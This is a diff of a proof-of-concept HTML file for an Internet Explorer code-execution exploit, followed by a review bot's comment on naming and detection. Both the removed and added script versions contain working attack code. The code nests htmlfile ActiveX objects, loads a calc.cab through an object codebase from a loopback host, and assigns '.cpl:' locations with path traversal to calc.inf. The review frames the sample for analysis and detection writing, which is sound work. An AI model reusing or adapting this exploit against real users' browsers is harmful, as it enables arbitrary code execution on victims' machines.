🤬
  • ■ ■ ■ ■ ■ ■
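--- a/poc.html
+++ b/poc.html
@@ -5,65 +5,73 @@
  <meta http-equiv="X-UA-Compatible" content="IE=11">
  </head>
  <body>
- <script>
-function(){
- try{
- window['HTMLElement']['prototype']['appendChild']['call'](window['document']['body'],
- window['Document']['prototype']['createElement']['call'](window['document'],'iframe'));
- }catch(_0x1c747c){
- window['HTMLElement']['prototype']['appendChild']['call'](window['document']['documentElement'],
- window['Document']['prototype']['createElement']['call'](window['document'],'iframe'));
- }
- iframeActxHtml1 = new window['Document']['prototype']['createElement']['call'](window['document'],'iframe')['contentWindow']['ActiveXObject']('htmlfile');
- window['Document']['prototype']['createElement']['call'](window['document'],'iframe')['contentDocument']['open']()['close']();
- try{
- window['HTMLElement']['prototype']['removeChild']['call'](window['document']['body'],
- window['Document']['prototype']['createElement']['call'](window['document'],'iframe'));
- }catch(_0x5afb73){
- window['HTMLElement']['prototype']['removeChild']['call'](window['document']['documentElement'],
- window['Document']['prototype']['createElement']['call'](window['document'],'iframe'));
- }
- iframeActxHtml1['open']()['close']();
- var iframeActxHtml2= iframeActxHtml1['Script']['ActiveXObject')]('htmlFile');
- iframeActxHtml2['open']()['close']();
- iframeActxHtml3 = iframeActxHtml2[('Script')]['ActiveXObject']('htmlFile');
- iframeActxHtml3['open']()['close']();
- var iframeActxHtml4=new iframeActxHtml3['Script'][('ActiveXObject')]('htmlFile');
- iframeActxHtml4['open']()['close']();
- var actx_html_0=new ActiveXObject('htmlfile'),
- actx_html_1=new ActiveXObject('htmlfile'),
- actx_html_2=new ActiveXObject('htmlfile'),
- actx_html_3=new ActiveXObject('htmlfile'),
- actx_html_4=new ActiveXObject('htmlfile'),
- actx_html_5=new ActiveXObject('htmlfile'),
- xmlhttpreq1=new window['XMLHttpRequest'](),
- window['setTimeout']=window['setTimeout'];
- window['XMLHttpRequest']['prototype']['open']['call'](xmlhttpreq1,'GET','http://localhost/calc.cab',![]),
- window['XMLHttpRequest']['prototype']['send']['call'](xmlhttpreq1),
- iframeActxHtml4['Script']['document']['write']('&amp;lt;body>');
- var cabloadunpack=window['Document']['prototype']['createElement']['call'](iframeActxHtml4['Script']['document'],'object');
- cabloadunpack['setAttribute']('codebase','http://localhost/calc.cab#version=5,0,0,0');
- cabloadunpack['setAttribute']('classid','CLSID:b7771b25-4e74-4168-add9-04062d629d9a'),
- window['HTMLElement']['prototype']['appendChild']['call'](iframeActxHtml4['Script']['document']['body'],cabloadunpack),
- actx_html_0['Script']['location']='.cpl:123',
- actx_html_0['Script']['location']='.cpl:123',
- actx_html_0['Script']['location']='.cpl:123',
- actx_html_0['Script']['location']='.cpl:123',
- actx_html_0['Script']['location']='.cpl:123',
- actx_html_0['Script']['location']='.cpl:123',
- actx_html_0['Script']['location']='.cpl:123',
- actx_html_0['Script']['location']='.cpl:123',
- actx_html_0['Script']['location']='.cpl:123',
- actx_html_0['Script']['location']='.cpl:../../../AppData/Local/Temp/Low/calc.inf',
- actx_html_1['Script']['location']='.cpl:../../../AppData/Local/Temp/calc.inf',
- actx_html_2['Script']['location']='.cpl:../../../../AppData/Local/Temp/Low/calc.inf',
- actx_html_3['Script']['location']='.cpl:../../../../AppData/Local/Temp/calc.inf',
- actx_html_4['Script']['location']='.cpl:../../../../../Temp/Low/calc.inf',
- actx_html_3['Script']['location']='.cpl:../../../../../Temp/calc.inf',
- actx_html_3['Script']['location']='.cpl:../../Low/calc.inf',
- actx_html_3['Script']['location']='.cpl:../../calc.inf';
-}();
- </script>
+<script>
+function exploit() {
+ var x = window["document"];
+ var then = window["Document"]["prototype"]["createElement"];
+ var _0x4d7c02 = window["Document"]["prototype"]["write"];
+ var PL$22 = window["HTMLElement"]["prototype"]["appendChild"];
+ var opfilter = window["HTMLElement"]["prototype"]["removeChild"];
+ var range = then["call"](x, "iframe");
+ try {
+ PL$22["call"](x["body"], range);
+ } catch (errx) {
+ PL$22["call"](x["documentElement"], range);
+ }
+ var ACTIVEX = range["contentWindow"]["ActiveXObject"];
+ var view = new ACTIVEX("htmlfile");
+ range["contentDocument"]["open"]()["close"]();
+
+ try {
+ opfilter["call"](x["body"], range);
+ } catch (err) {
+ opfilter["call"](x["documentElement"], range);
+ }
+ view["open"]()["close"]();
+ var mappedObj = new (view["Script"]["ActiveXObject"])("htmlFile");
+ mappedObj["open"]()["close"]();
+ var TokenType = new (mappedObj["Script"]["ActiveXObject"])("htmlFile");
+ TokenType["open"]()["close"]();
+ var model = new (TokenType["Script"]["ActiveXObject"])("htmlFile");
+ model["open"]()["close"]();
+ var iedom = new ActiveXObject("htmlfile");
+ var rp_test = new ActiveXObject("htmlfile");
+ var wmp_test = new ActiveXObject("htmlfile");
+ var doc = new ActiveXObject("htmlfile");
+ var a = new ActiveXObject("htmlfile");
+ var fake = new ActiveXObject("htmlfile");
+ var errors = window["XMLHttpRequest"];
+ var $node = new errors;
+ var directiveProcessors = errors["prototype"]["open"];
+ var nodeTypeRender = errors["prototype"]["send"];
+ var newAttributes = window["setTimeout"];
+ directiveProcessors["call"]($node, "GET", "http://127.0.0.1/calc.cab", ![]);
+ nodeTypeRender["call"]($node);
+ model["Script"]["document"]["write"]("<body>");
+ var PL$41 = then["call"](model["Script"]["document"], "object");
+ PL$41["setAttribute"]("codebase", "http://127.0.0.1/calc.cab#version=5,0,0,0");
+ PL$41["setAttribute"]("classid", "CLSID:edbc374c-5730-432a-b5b8-de94f0b57217");
+ PL$22["call"](model["Script"]["document"]["body"], PL$41);
+ iedom["Script"]["location"] = ".cpl:123";
+ iedom["Script"]["location"] = ".cpl:123";
+ iedom["Script"]["location"] = ".cpl:123";
+ iedom["Script"]["location"] = ".cpl:123";
+ iedom["Script"]["location"] = ".cpl:123";
+ iedom["Script"]["location"] = ".cpl:123";
+ iedom["Script"]["location"] = ".cpl:123";
+ iedom["Script"]["location"] = ".cpl:123";
+ iedom["Script"]["location"] = ".cpl:123";
+ iedom["Script"]["location"] = ".cpl:../../../AppData/Local/Temp/Low/calc.inf";
+ rp_test["Script"]["location"] = ".cpl:../../../AppData/Local/Temp/calc.inf";
+ wmp_test["Script"]["location"] = ".cpl:../../../../AppData/Local/Temp/Low/calc.inf";
+ doc["Script"]["location"] = ".cpl:../../../../AppData/Local/Temp/calc.inf";
+ a["Script"]["location"] = ".cpl:../../../../../Temp/Low/calc.inf";
+ doc["Script"]["location"] = ".cpl:../../../../../Temp/calc.inf";
+ doc["Script"]["location"] = ".cpl:../../Low/calc.inf";
+ doc["Script"]["location"] = ".cpl:../../calc.inf";
+}
+exploit();
+</script>
  </body>
 </html>
  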
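Review bot: The rewritten `exploit()` keeps machine-generated identifiers that hide what each value is: `then` holds `Document.prototype.createElement`, `PL$22` holds `appendChild`, `opfilter` holds `removeChild` and `errors` holds `XMLHttpRequest`, so anyone analysing the sample has to re-derive every role. Naming them after what they hold, e.g. `var createElement = window["Document"]["prototype"]["createElement"];`, would make the three observable stages readable for someone writing detections from it: the nested `htmlfile` ActiveXObject chain, the `<object>` whose `codebase` points at `calc.cab`, and the `.cpl:` location assignments that traverse to `calc.inf`. `_0x4d7c02`, `newAttributes` and `fake` are assigned and never read in this section and can be dropped. The commit also changes the `classid` CLSID and the host from `localhost` to `127.0.0.1` without saying why; a one-line comment above `exploit()` such as `// Reproduces <ADVISORY-ID>; CLSID changed because <REASON>` would record that.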